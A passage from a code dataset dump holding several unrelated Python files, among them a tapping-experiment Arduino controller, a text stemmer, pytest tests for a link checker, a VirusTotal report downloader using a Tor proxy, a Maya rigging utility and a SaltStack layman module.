block\nN_trials_per_block_per_cond = 2;\n\n#%% Experiment\n\n# check for file with names and pseudonyms\nfilename_names = \"/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO_Dic_names_pseud.dat\"\n\ntry:\n f_names = open(filename_names,\"r\")\n\n if os.stat(filename_names).st_size == 0:\n next_subject_number = '001';\n f_names.close();\n else:\n content = f_names.read();\n last_subject_number = int(content [-3:]);\n next_subject_number = '{0:0>3}'.format(last_subject_number + 1);\n f_names.close()\n \nexcept IOError:\n print('El archivo no esta donde deberia, ubicalo en la carpeta correcta y volve a correr esta celda')\n raise\n\n# set subject name for filename\nname = raw_input(\"Ingrese su nombre: \") \n\nf_names = open(filename_names,\"a\")\nf_names.write('\\n'+name+'\\tS'+next_subject_number)\nf_names.close()\n\ncond_order_block = random.choice(all_possible_orders_conditions)\n\nall_possible_orders_conditions.pop(all_possible_orders_conditions.index(cond_order_block))\n\n# run blocks\nblock_counter = 0;\n\nwhile (block_counter < N_blocks):\n \n condition_vector = [] # vector that will contain the specified condition the correct amount of times (it's important to restart it here!)\n for i in range(N_trials_per_block_per_cond):\n condition_vector.append(all_conditions[cond_order_block[block_counter]])\n # total number of trials per block\n N_trials_per_block = len(condition_vector) # unlike N_trials_per_block_per_cond this variable will change if a trial goes wrong\n\n Stim_conds = [] # vector that will contain all stimulus conditions\n Fdbk_conds = [] # vector that will contain all feedback conditions\n for i in range(len(condition_vector)):\n Stim_conds.append(condition_vector[i][0])\n Fdbk_conds.append(condition_vector[i][1])\n \n # run one block\n raw_input(\"Press Enter to start block\") \n \n # set time for file name\n timestr = time.strftime(\"%Y_%m_%d-%H.%M.%S\")\n \n # trial counter\n trial = 0\n \n conditions = [] # vector that will contain exact message sent to arduino to register the conditions played in each trial\n valid_trial = [] # vector that will contain 1 if the trial was valid or 0 if it wasn't\n errors = [] # vector that will contain the type of error that ocurred if any did \n \n # generate filename for file that will contain all conditions used in the trial along with the valid_trials vector \n filename_block = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-trials\" \n \n while (trial < N_trials_per_block):\n raw_input(\"Press Enter to start trial (%d/%d)\" % (trial+1,N_trials_per_block));\n plt.close(1)\n plt.close(2)\n \n # generate raw data file \n filename_raw = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-\"+\"trial\"+str(trial)+\"-raw.dat\"\n f_raw = open(filename_raw,\"w+\")\n \n # generate extracted data file name (will save raw data, stimulus time, feedback time and asynchrony)\n filename_data = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-\"+\"trial\"+str(trial)\n \n # wait random number of seconds before actually starting the trial\n wait = random.randrange(10,20,1)/10.0\n time.sleep(wait)\n \n # define stimulus and feedback condition for this trial\n Stim = Stim_conds[trial];\n Resp = Fdbk_conds[trial];\n \n # send message with conditions to arduino\n message = \";S%c;F%c;N%c;A%d;I%d;n%d;X\" % (Stim, Resp,'B', 3, ISI, n_stim)\n arduino.write(message)\n conditions.append(message)\n \n # read information from arduino\n data = []\n aux = arduino.readline()\n while (aux[0]!='E'):\n data.append(aux);\n f_raw.write(aux); # save raw data\n aux = arduino.readline();\n \n # Separates data in type, number and time\n e_total = len(data)\n e_type = []\n e_number = []\n e_time = []\n for event in data:\n e_type.append(event.split()[0])\n e_number.append(int(event.split()[1]))\n e_time.append(int(event.split()[2]))\n \n # Separates number and time according to if it comes from stimulus or response\n stim_number = []\n resp_number = []\n stim_time = []\n resp_time = []\n for events in range(e_total):\n if e_type[events]=='S':\n stim_number.append(e_number[events])\n stim_time.append(e_time[events])\n \n if e_type[events]=='R':\n resp_number.append(e_number[events])\n resp_time.append(e_time[events])\n \n # determine number of stimulus and responses registered\n N_stim = len(stim_time)\n N_resp = len(resp_time)\n \n # close raw data file \n f_raw.close()\n \n # ---------------------------------------------------------------\n # Asynchronies calculation\n \n # vector that will contain asynchronies if they are calculated\n asynchrony = []\n \n try: \n if N_resp > 0: # if there were any responses\n \n j = 0; # stimulus counter\n k = 0; # responses counter for finding first stimuli with decent response\n i = N_resp-1; # responses counter for finding last stimuli with response\n first_stim_responded_index = 0;\n last_resp_index = 0;\n first_stim_responded_flag = False; # flag if there was a stimuli with a recent response\n last_resp_flag = False; \n \n \n # find first stimulus with a decent response\n while j < 5: # if the response doesn't match with any of the 5 first stimuli, then re-do the trial\n diff = stim_time[j]-resp_time[k];\n if abs(diff)<200:\n first_stim_responded_index = j;\n first_stim_responded_flag = True;\n break;\n else:\n j = j+1;\n\n \n if first_stim_responded_flag == True:\n pass;\n else:\n print('Error tipo NFR')\n errors.append('NoFirstResp')\n raise Error \n \n \n # find response to last stimulus (last response that should be considerated)\n while i > 0:\n diff = stim_time[N_stim-1]-resp_time[i]\n if abs(diff)<200:\n last_resp_index = i;\n last_resp_flag = True;\n break;\n else:\n i = i-1;\n \n if last_resp_flag == True:\n pass;\n else:\n print('Error tipo NLR')\n errors.append('NoLastResp')\n raise Error \n \n \n # new vectors of stimulus and responses that only contain those that have a pair of the other type \n stim_paired = stim_time[first_stim_responded_index:]\n resp_paired = resp_time[k:(last_resp_index+1)]\n N_stim_paired = len(stim_paired)\n N_resp_paired = len(resp_paired)\n \n if N_stim_paired == N_resp_paired:\n \n # the trial is valid! then:\n valid_trial.append(1)\n errors.append('NoError') \n \n # Calculate and save asynchronies\n for k in range(N_stim_paired):\n asynchrony.append(stim_paired[k]-resp_paired[k])\n \n #==============================================================================\n # Plot all pair of stimulus and feedback\n# plt.figure(1)\n# my_labels = {\"stim\" : \"Stimulus\", \"resp\" : \"Response\"}\n# for j in range(N_stim):\n# plt.axvline(x=stim_time[j],color='b',linestyle='dashed',label=my_labels[\"stim\"])\n# my_labels[\"stim\"] = \"_nolegend_\"\n# \n# for k in range(N_resp):\n# plt.axvline(x=resp_time[k],color='r',label=my_labels[\"resp\"])\n# my_labels[\"resp\"] = \"_nolegend_\"\n# \n# # Put a yellow star on the stimulus that have a paired response.\n# for j in range(N_stim_paired):\n# plt.plot(stim_paired[j],0.5,'*',color='y')\n# \n# plt.axis([min(stim_time)-50,max(resp_time)+50,0,1])\n# \n# plt.xlabel('Tiempo[ms]',fontsize=12)\n# plt.ylabel(' ')\n# plt.grid() \n# plt.legend(fontsize=12)\n \n #==============================================================================\n \n #==============================================================================\n # Plot asynchronies\n# plt.figure(2)\n# plt.plot(asynchrony,'.-')\n# plt.xlabel('# beep',fontsize=12)\n# plt.ylabel('Asynchrony[ms]',fontsize=12)\n# plt.grid() \n #==============================================================================\n \n # go to next trial\n trial = trial + 1;\n \n else:\n if N_stim_paired > N_resp_paired: # if subject skipped an stimuli\n # trial is not valid! then:\n print('Error tipo SS')\n errors.append('SkipStim')\n else: # if there's too many responses\n # trial is not valid! then:\n print('Error tipo TMR')\n errors.append('TooManyResp')\n \n raise Error\n \n \n else: # if there were no responses\n # trial is not valid! then:\n print('Error tipo NR')\n errors.append('NoResp') \n raise Error\n \n \n except (Error):\n # trial is not valid! then:\n valid_trial.append(0)\n \n # appends conditions for this trial at the end of the conditions vectors, so that it can repeat at the end\n Stim_conds.append(Stim_conds[trial])\n Fdbk_conds.append(Fdbk_conds[trial])\n \n # go to next trial\n trial = trial + 1;\n # add 1 to number of trials per block since will have to repeat one\n N_trials_per_block = N_trials_per_block + 1;\n\n # SAVE DATA FROM TRIAL (VALID OR NOT)\n np.savez_compressed(filename_data, raw=data, stim=stim_time, resp=resp_time, asynch=asynchrony)\n\n#==============================================================================\n# # If you want to show plots for each trial\n# plt.show(block=False)\n# plt.show()\n# plt.pause(0.5)\n# \n#==============================================================================\n\n print(\"Fin del bloque!\")\n\n # ask subject what condition of stimulus and responses considers he/she heard\n stim_subject_percep = raw_input(\"Considera que el estimulo llegó por audio izquierdo(L), derecho(R) o ambos(B)?\") \n fdbk_subject_percep = raw_input(\"Considera que su respuesta llegó por audio izquierdo(L), derecho(R) o ambos(B)?\") \n block_cond_subject_percep = [stim_subject_percep, fdbk_subject_percep]\n \n # SAVE DATA FROM BLOCK (VALID AND INVALID TRIALS AND THEIR CONDITIONS) \n np.savez_compressed(filename_block,trials=valid_trial,conditions=conditions,errors=errors,subject_percept=block_cond_subject_percep)\n \n # go to next block\n block_counter = block_counter +1;\n\nprint(\"Fin del experimento!\")\n\n#%% A look at the last trial\n\nplt.figure(1)\nmy_labels = {\"stim\" : \"Stimulus\", \"resp\" : \"Response\"}\nfor j in range(N_stim):\n plt.axvline(x=stim_time[j],color='b',linestyle='dashed',label=my_labels[\"stim\"])\n my_labels[\"stim\"] = \"_nolegend_\"\n\nfor k in range(N_resp):\n plt.axvline(x=resp_time[k],color='r',label=my_labels[\"resp\"])\n my_labels[\"resp\"] = \"_nolegend_\"\n\n# Put a yellow star on the stimulus that have a paired response.\nfor j in range(N_stim_paired):\n plt.plot(stim_paired[j],0.5,'*',color='y')\n \nplt.axis([min(stim_time)-50,max(resp_time)+50,0,1])\n \nplt.xlabel('Tiempo[ms]',fontsize=12)\nplt.ylabel(' ')\nplt.grid() \nplt.legend(fontsize=12)\n\nplt.figure(2)\nplt.plot(asynchrony,'.-')\nplt.xlabel('# beep',fontsize=12)\nplt.ylabel('Asynchrony[ms]',fontsize=12)\nplt.grid() \n\n\n#%% Loading data\n\n#def Loading_data(subject_number,block, trial, *asked_data):\n# # IMPORTANTE: DAR INPUTS COMO STRING\n#\n# if trial is None:\n# file_to_load = glob.glob('/home/paula/Tappingduino3/tappingduino-3-master/Datos/S'+subject_number+\"*-block\"+str(block)+\"-trials.npz\") \n# else:\n# file_to_load = glob.glob('/home/paula/Tappingduino3/tappingduino-3-master/Datos/S'+subject_number+\"*-block\"+str(block)+\"-trial\"+str(trial)+\".npz\") \n# \n# print(file_to_load[0])\n# npz = np.load(file_to_load[0])\n# if len(asked_data) == 0:\n# print(\"The file contains:\")\n# return sorted(npz)\n# else:\n# data_to_return = []\n# for a in asked_data:\n# data_to_return.append(npz[a]) \n# return data_to_return[:]\n#\n#\n#\n#asynch = Loading_data('002',0,1,'asynch')\n#plt.plot(asynch[0],'.-')\n#plt.xlabel('# beep',fontsize=12)\n#plt.ylabel('Asynchrony[ms]',fontsize=12)\n#plt.grid() ","sub_path":"Código/Comunicación con Python/Versiones Controlador 2019/DEMO -Controlador - Exceptions - 1CondXBlock.py","file_name":"DEMO -Controlador - Exceptions - 1CondXBlock.py","file_ext":"py","file_size_in_byte":16532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276559527","text":"import codecs\r\nimport sys\r\nimport os\r\n\r\nclass Stemmer:\r\n def __init__(self, path, write_path):\r\n self.path = path\r\n self.dict_path = 'suffix.txt'\r\n self.write_path = write_path\r\n self.dict = []\r\n\r\n with codecs.open(self.dict_path, 'rU', 'utf-8') as f:\r\n suffixes = f.read()\r\n suffixes = suffixes.replace('\\n', ' ').replace('\\r', '')\r\n\r\n suff = suffixes.split(' ')\r\n\r\n for item in suff:\r\n if item != '':\r\n self.dict.append(item)\r\n\r\n with codecs.open(path, 'rU', 'utf-8') as f:\r\n self.items = f.read()\r\n \r\n self.out_file = codecs.open(write_path, 'w+', 'utf-8')\r\n self.stem()\r\n return\r\n \r\n def stem(self):\r\n index = []\r\n para = self.items.split('\\n\\n') #assuming that paragraphs are separated by 2 newline characters\r\n\r\n for p in para:\r\n sentences = p.split('.|!|?')\r\n for s in sentences:\r\n words = s.split(' ')\r\n for word in words:\r\n punc = '' #stores the punctuation present at the end of the word, if any\r\n isPunc = False #checks if a word has any punctuation attached to it\r\n for i in range(1, len(word)):\r\n if word.endswith('.') or word.endswith('?') or word.endswith('?') or word.endswith(','):\r\n new_word = word[i : len(word) - 1]\r\n isPunc = True\r\n punc = word[len(word) - 1]\r\n else:\r\n new_word = word[i :]\r\n rep_word = word[0 : i]\r\n if isPunc:\r\n rep_word += punc\r\n if new_word in self.dict:\r\n self.items = self.items.replace(word, rep_word)\r\n \r\n self.out_file.write(self.items)\r\n\r\ndir1 = 'test_copy/'\r\ndir2 = 'test_stemmed/'\r\nfiles = os.listdir(dir1)\r\nfor fileName in files:\r\n\tfilepath1 = dir1 + fileName\r\n\tfilepath2 = dir2 + fileName\r\n\tpath = filepath1\r\n\twrite_path = filepath2\r\n\tlist = [Stemmer(path, write_path)]","sub_path":"stemmer_test.py","file_name":"stemmer_test.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124163677","text":"import numpy as np\nfrom scipy.special import erfc, erf, expi\nimport matplotlib.pyplot as plt\n\nt=np.arange(1000)/5\ndt=t[1]-t[0]\ntau=5\nT=40\ns=1\nbeta=45\n\nA=(1/tau-beta/tau**2*expi(beta/tau)*np.exp(-beta/tau))*np.exp(-t/tau)+beta/tau**2*expi((beta+t)/tau)*np.exp(-(beta+t)/tau)-beta/(tau*(beta+t))\nB=np.exp(-0.5*(t-T)**2/s**2)\nC=np.convolve(A,B)[:1000]\nplt.figure()\nplt.plot(t, C, '-.')\nplt.show()\n","sub_path":"AnalysisE/fit/Cs137/1ns/temp/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"528606018","text":"import src.checkFile as checkFile\nfrom unittest import mock\nimport pytest\n\n\nclass Args:\n pass\n\n\nargs = Args()\nargs.file = \"resources/test.html\"\nargs.secureHttp = None\nargs.json = None\nargs.all = None\nargs.good = None\nargs.bad = None\nargs.ignoreFile = None\nargs.telescope = None\n\n\ndef test_no_file_exception():\n args.file = \"wrong/file/path\"\n\n with pytest.raises(FileNotFoundError):\n checkFile.checkFile(args)\n\n args.file = \"resources/test.html\"\n\n\n@mock.patch(\"src.checkFile.checkFile.headRequest\")\ndef test_headRequest_200(mock_headRequest):\n\n link = \"http://google.com\"\n mock_headRequest.return_value = {\"url\": link, \"status\": 200, \"secured\": False}\n cF = checkFile.checkFile(args)\n\n assert cF.headRequest(link) == {\n \"url\": \"http://google.com\",\n \"status\": 200,\n \"secured\": False,\n }\n\n\n@mock.patch(\"src.checkFile.checkFile.headRequest\")\ndef test_headRequest_404(mock_headRequest):\n\n link = \"http://google.cim\"\n mock_headRequest.return_value = {\"url\": link, \"status\": 404, \"secured\": False}\n cF = checkFile.checkFile(args)\n\n assert cF.headRequest(link) == {\n \"url\": \"http://google.cim\",\n \"status\": 404,\n \"secured\": False,\n }\n\n\ndef test_parseWebAddress():\n\n lineToParse = \"https://www.google.com/search?q=help\"\n\n cF = checkFile.checkFile(args)\n\n assert cF.parseWebAddress(lineToParse) == \"https://www.google.com/search?q=help\"","sub_path":"tests/test_checkFile.py","file_name":"test_checkFile.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355683525","text":"import requests\nimport json\nimport random\nimport logging\nimport time\nimport os\n\n\nclass VTReportDownloader(object):\n\n def __init__(self, _url_list=[]):\n self.url_list = _url_list\n # self.TorInit = TorInit(socks_port=9050)\n # self.TorInit._startTorProxy(kill=kill)\n self.user_agent = ''\n self.proxies = {\n # 'http': 'socks5h://127.0.0.1:9050',\n 'https': 'socks5h://127.0.0.1:9050'\n }\n\n def _sys_sleep(self):\n u = random.uniform(0, 0.25)\n logging.info('system sleeps {} seconds...'.format(u))\n time.sleep(u)\n\n def get_page_source(self, url):\n if url is None:\n return None\n s = requests.Session()\n s.proxies = self.proxies\n headers = {\n 'User-Agent': self.user_agent,\n }\n # Make the HTTP request through the session.\n r = s.get(url, headers=headers)\n # Check if the proxy was indeed used (the text should contain the proxy IP).\n if r.status_code == 200:\n r.encoding = 'utf-8'\n html_contnet = r.text\n logging.info('Report downloaded.')\n return html_contnet\n return None\n\n\nif __name__ == '__main__':\n\n pass\n","sub_path":"vt_download_samples/vt_report_downloader.py","file_name":"vt_report_downloader.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151756092","text":"import scipy.io as scio\nimport os\nimport numpy as np\nimport shutil\nimport pandas as pd\n\ndef pro1(path,targetFolder):\n if not os.path.exists(targetFolder):\n os.mkdir(targetFolder)\n list_dirs = os.walk(path)\n for root, dirs, files in list_dirs:\n for f in files:\n if \"导\" in root:\n city = root.split('\\\\')[1]\n if not os.path.exists(os.path.join(targetFolder,city)):\n os.mkdir(os.path.join(targetFolder,city))\n print(os.path.join(root, f))\n shutil.copy(os.path.join(root, f),os.path.join(targetFolder,city,f))\n\ndef csvTonNumpy(path):\n # print(sorted(os.listdir(\"../raw_data\")))\n classNames = sorted(os.listdir(path))\n print(classNames)\n\n dictName = {}\n for i in range(len(classNames)):\n dictName[classNames[i]] = i\n print(dictName)\n\n count = 0;\n for classname in classNames:\n folder = os.path.join(path, classname)\n for basename in os.listdir(folder):\n file = os.path.join(folder, basename)\n data = pd.read_csv(file, header=-1).values[:, 1]\n x = np.reshape(data, (1, len(data)))\n y = np.zeros((x.shape[0], 1)) + dictName[classname]\n # print(file)\n # print(data.shape)\n if count == 0:\n allX = x;\n allY = y;\n else:\n allX = np.vstack((allX, x))\n allY = np.vstack((allY, y))\n count += 1\n print(count)\n\n\n np.save('allX.npy',allX)\n np.save('allY.npy', allY)\n print(allY)\n print(allX.shape)\n print(allY.shape)\n\ndef pro2(path,targetFolder):\n years=['2014','2015','2016','2017'];\n list_dirs = os.walk(path)\n for root, dirs, files in list_dirs:\n for f in files:\n if \"导\" in root:\n city = root.split('\\\\')[1]\n if not os.path.exists(os.path.join(targetFolder, city)):\n os.mkdir(os.path.join(targetFolder, city))\n for year in years:\n if year in root:\n break;\n if not os.path.exists(os.path.join(targetFolder, city,year)):\n os.mkdir(os.path.join(targetFolder, city,year))\n print(os.path.join(root, f))\n shutil.copy(os.path.join(root, f), os.path.join(targetFolder, city, year,f))\n\nif __name__=='__main__':\n path=\"./raw_data\"\n #\n # pro1(path,\"./data/pro1_data\")\n csvTonNumpy(\"./data/pro1_data\")\n\n # pro2(path, \"./data/pro2_data\")\n # for folder in os.listdir(\"./data/pro2_data\"):\n # csvTonNumpy(os.path.join(\"./data/pro2_data\",folder))\n\n\n\n\n\n\n","sub_path":"python/lstmPre10/predict_pro1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625958305","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport unittest\nimport init_env\nimport mock\nfrom ut_base import BaseTestCase\nfrom modules.alert.trigger_manage import TriggerManager\n\n\nclass TestTriggerManage(BaseTestCase):\n \"\"\"\n \"\"\"\n def setUp(self):\n super(TestTriggerManage, self).setUp()\n self.interval_config = {\"type\": \"interval\",\n \"timeInterval\": 20,\n \"timeUnit\": \"s\",\n \"startDateTime\": \"2016-09-15 19:23:00\"}\n\n self.interval_time_units = {\"s\": 0, \"m\": 0, \"h\": 0, \"d\": 0, \"w\": 0}\n\n self.datetime_config = {\"type\": \"dateTime\",\n \"dateTime\": \"2022-09-15 22:00:00\"}\n\n def convert_to_seconds(self, time_interval, time_unit):\n \"\"\"\n \"\"\"\n unit_seconds = {'s': 1, 'm': 60, 'h': 3600, 'd': 86400, 'w': 604800}\n return int(time_interval) * unit_seconds[time_unit]\n\n def test_interval_trigger(self):\n \"\"\"\n 测试生成时间间隔触发器\n \"\"\"\n # case1: 时间单位不正确\n wrong_units = ['S', 'H', 'D', 'Y', 'y', 'W']\n for unit in wrong_units:\n self.interval_config['timeUnit'] = unit\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case2: 时间间隔值错误\n wrong_interval = [-2, 'x', 0]\n self.interval_config['timeUnit'] = 'm'\n for interval in wrong_interval:\n self.interval_config['timeInterval'] = interval\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case3: 起始时间格式不正确\n wrong_start_time = [\"2016/08/09 19:23:00\", \"08-15-2016 19:23:00\"]\n self.interval_config['timeInterval'] = 10\n self.interval_config['timeUnit'] = 'm'\n for start_time in wrong_start_time:\n self.interval_config['startDateTime'] = start_time\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case3: 正确的时间间隔和单位\n interval_list = [1, 7, 20, 60, 100]\n unit_list = ['m', 'h', 'd', 'w']\n start_time_list = ['2016-09-15 19:23:00',\n \"2016-09-15 19:23\",\n \"2016-09-15 19\",\n \"2016-09-15\"]\n\n for interval in interval_list:\n for unit in unit_list:\n for start_time in start_time_list:\n self.interval_config['timeInterval'] = interval\n self.interval_config['timeUnit'] = unit\n self.interval_config['startDateTime'] = start_time\n\n trigger = TriggerManager.interval_trigger(self.interval_config)\n seconds = self.convert_to_seconds(interval, unit)\n self.assertEqual(seconds, int(trigger.interval_length))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"docker/container_install_script/docker-container-installer/anyrobot/manager/manage_server/tests/ut_modules/test_alert/test_trigger_manage.py","file_name":"test_trigger_manage.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252646618","text":"import os\nimport json\n\ndir_path = os.path.dirname(__file__)\nin_path = os.path.join(dir_path, 'symbols_unicode.json')\nout_path = os.path.join(dir_path, 'alphabet.json')\n\n# Load ipa symbols\nwith open(in_path, 'r') as f:\n data = json.load(f)\n\n# Create alphabet format\nsymbols = {}\n\nfor k, v in data.items():\n for code in v:\n char = chr(int(code, 16))\n\n symbols[char] = {\n 'hex': code\n }\n\nout_data = {\n 'symbols': symbols,\n 'normalizations': {\n 'ɡ': ['g'],\n }\n}\n\n# Write\nwith open(out_path, 'w', encoding='utf-8') as f:\n json.dump(out_data, f, indent=4, ensure_ascii=False)\n","sub_path":"scripts/alphabets/ipa/create_alphabet_file.py","file_name":"create_alphabet_file.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"415170969","text":"from __future__ import absolute_import\n\nimport maya.OpenMaya as om\nimport maya.cmds as cmds\n\nfrom rigging.tools import utils as rt_utils\n\n\ndef get_poleVec_position(root_pos, mid_pos, end_pos, length):\n root_jnt_vector = om.MVector(root_pos[0], root_pos[1], root_pos[2])\n mid_jnt_vector = om.MVector(mid_pos[0], mid_pos[1], mid_pos[2])\n end_jnt_vector = om.MVector(end_pos[0], end_pos[1], end_pos[2])\n\n line = (end_jnt_vector - root_jnt_vector)\n point = (mid_jnt_vector - root_jnt_vector)\n\n scale_value = (line * point) / (line * line)\n projection_vector = line * scale_value + root_jnt_vector\n\n root_to_mid_length = (mid_jnt_vector - root_jnt_vector).length()\n mid_to_end_length = (end_jnt_vector - mid_jnt_vector).length()\n total_length = root_to_mid_length + mid_to_end_length\n\n pole_vector_position = (mid_jnt_vector - projection_vector).normal() * length + mid_jnt_vector\n\n return pole_vector_position\n\n\ndef get_ikh_poleVec_position(ikHandle, length):\n ik_jnt_list = cmds.ikHandle(ikHandle, q=1, jointList=True)\n ik_jnt_list.append(cmds.listRelatives(ik_jnt_list[-1], children=1, type='joint')[0])\n\n root_joint_position = cmds.xform(ik_jnt_list[0], q=1, ws=1, t=1)\n mid_joint_position = cmds.xform(ik_jnt_list[1], q=1, ws=1, t=1)\n end_joint_position = cmds.xform(ik_jnt_list[2], q=1, ws=1, t=1)\n\n pole_vec_position = get_poleVec_position(root_joint_position, mid_joint_position, end_joint_position, length)\n\n return pole_vec_position\n\n\ndef create_poleVec_locator(ikHandle, constraint=False, length=1):\n locator = cmds.spaceLocator()\n position = cmds.move(get_ikh_poleVec_position(ikHandle, length).x, get_ikh_poleVec_position(ikHandle, length).y,\n get_ikh_poleVec_position(ikHandle, length).z, locator)\n locator = cmds.rename(position, '%s_%s' % (rt_utils.prefix_name(ikHandle), 'pv'))\n\n if constraint:\n poleVector_constraint = cmds.poleVectorConstraint(locator, ikHandle)\n rt_utils.constraint_rename(poleVector_constraint)\n\n return locator, ikHandle\n","sub_path":"rigging/library/utils/poleVector.py","file_name":"poleVector.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481829725","text":"'''\nSupport for Layman\n\n'''\n\nimport salt.utils\n\ndef __virtual__():\n '''\n Only work on Gentoo systems with layman installed\n '''\n if __grains__['os'] == 'Gentoo' and salt.utils.which('layman'):\n return 'layman'\n return False\n\ndef add(overlay):\n '''\n Add the given overlay from the caced remote list to your locally\n installed overlays. Specify 'ALL' to add all overlays from the\n remote list.\n\n Return a list of the new overlay(s) added:\n\n CLI Example::\n\n salt '*' layman.add \n '''\n ret = list()\n old_overlays = list_local()\n cmd = 'layman --quietness=0 --add {0}'.format(overlay)\n __salt__['cmd.retcode'](cmd)\n new_overlays = list_local()\n\n ret = [overlay for overlay in new_overlays if overlay not in old_overlays]\n return ret\n\n\ndef delete(overlay):\n '''\n Remove the given overlay from the your locally installed overlays.\n Specify 'ALL' to remove all overlays.\n\n Return a list of the overlays(s) that were removed:\n\n CLI Example::\n\n salt '*' layman.delete \n '''\n ret = list()\n old_overlays = list_local()\n cmd = 'layman --quietness=0 --delete {0}'.format(overlay)\n __salt__['cmd.retcode'](cmd)\n new_overlays = list_local()\n\n ret = [overlay for overlay in old_overlays if overlay not in new_overlays]\n return ret\n\ndef sync(overlay='ALL'):\n '''\n Update the specified overlay. Use 'ALL' to synchronize all overlays.\n This is the default if no overlay is specified.\n\n overlay\n Name of the overlay to sync. (Defaults to 'ALL')\n\n CLI Example::\n\n salt '*' layman.sync\n '''\n cmd = 'layman --quietness=0 --sync {0}'.format(overlay)\n return __salt__['cmd.retcode'](cmd) == 0\n\ndef list_local():\n '''\n List the locally installed overlays.\n\n Return a list of installed overlays:\n\n CLI Example::\n\n salt '*' layman.list_local\n '''\n cmd = 'layman --quietness=1 --list-local --nocolor'\n out = __salt__['cmd.run'](cmd).split('\\n')\n ret = [line.split()[1] for line in out]\n return ret\n","sub_path":"salt/modules/layman.py","file_name":"layman.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"197043939","text":"from typing import TYPE_CHECKING, List, Tuple\n\nfrom ...logger import Text, StyleCode\n\nif TYPE_CHECKING:\n from . import Logger\n\ntry:\n import torch\nexcept ImportError:\n torch = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass Inspect:\n def __init__(self, logger: 'Logger'):\n self.__logger = logger\n\n def _key_value_pair(self, key: any, value: any, style: StyleCode = Text.meta):\n return [(f'{str(key)}: ', Text.subtle),\n (str(value), style)]\n\n def _format_tensor(self, s: List[str], limit: int = 1_000, style: StyleCode = Text.value):\n res = []\n length = 0\n for p in s:\n if p in [',', ']', '[', '...']:\n res.append((p, Text.subtle))\n else:\n res.append((p, style))\n length += len(p)\n\n if length > limit:\n res.append((' ... ', Text.warning))\n break\n\n return res\n\n def _get_tensor_value(self, tensor):\n if torch is not None and isinstance(tensor, torch.Tensor):\n return str(tensor.item())\n else:\n return str(tensor)\n\n def _render_tensor(self, tensor, *, new_line: str = '\\n', indent: str = ''):\n if len(tensor) > 5:\n idx = [0, 1, 2, '...', len(tensor) - 1]\n else:\n idx = [i for i in range(len(tensor))]\n\n res = [indent, '[']\n if new_line == '\\n':\n next_indent = ' ' + indent\n else:\n next_indent = indent\n if len(tensor.shape) > 1:\n res.append(new_line)\n for i in idx:\n if i == '...':\n res.append(next_indent)\n res.append('...')\n else:\n res += self._render_tensor(tensor[i],\n new_line=new_line,\n indent=next_indent)\n if i != idx[-1]:\n res.append(', ')\n res.append(new_line)\n else:\n for i in idx:\n if i == '...':\n res.append('...')\n else:\n res += self._get_tensor_value(tensor[i])\n if i != idx[-1]:\n res.append(', ')\n\n res.append(indent)\n res.append(']')\n\n return res\n\n def _get_value_full(self, value: any):\n if isinstance(value, str):\n return [('\"', Text.subtle),\n (value, Text.value),\n ('\"', Text.subtle)]\n elif numpy is not None and isinstance(value, numpy.ndarray):\n return [*self._key_value_pair('dtype', value.dtype),\n '\\n',\n *self._key_value_pair('shape', [s for s in value.shape], Text.value),\n '\\n',\n *self._key_value_pair('min', numpy.min(value)),\n ' ',\n *self._key_value_pair('max', numpy.max(value)),\n ' ',\n *self._key_value_pair('mean', numpy.mean(value)),\n ' ',\n *self._key_value_pair('std', numpy.std(value)),\n '\\n',\n *self._format_tensor(self._render_tensor(value, new_line='\\n'))]\n elif torch is not None and isinstance(value, torch.Tensor):\n return [*self._key_value_pair('dtype', value.dtype),\n '\\n',\n *self._key_value_pair('shape', [s for s in value.shape], Text.value),\n '\\n',\n *self._key_value_pair('min', torch.min(value).item()),\n ' ',\n *self._key_value_pair('max', torch.max(value).item()),\n ' ',\n *self._key_value_pair('mean', torch.mean(value.to(torch.float)).item()),\n ' ',\n *self._key_value_pair('std', torch.std(value.to(torch.float)).item()),\n '\\n',\n *self._format_tensor(self._render_tensor(value, new_line='\\n'))]\n\n s = str(value)\n s = s.replace('\\r', '')\n return [s]\n\n def _shrink(self, s: str, style: StyleCode = Text.value, limit: int = 80):\n s = s.replace('\\r', '')\n lines = s.split('\\n')\n\n res = []\n length = 0\n for line in lines:\n if len(res) > 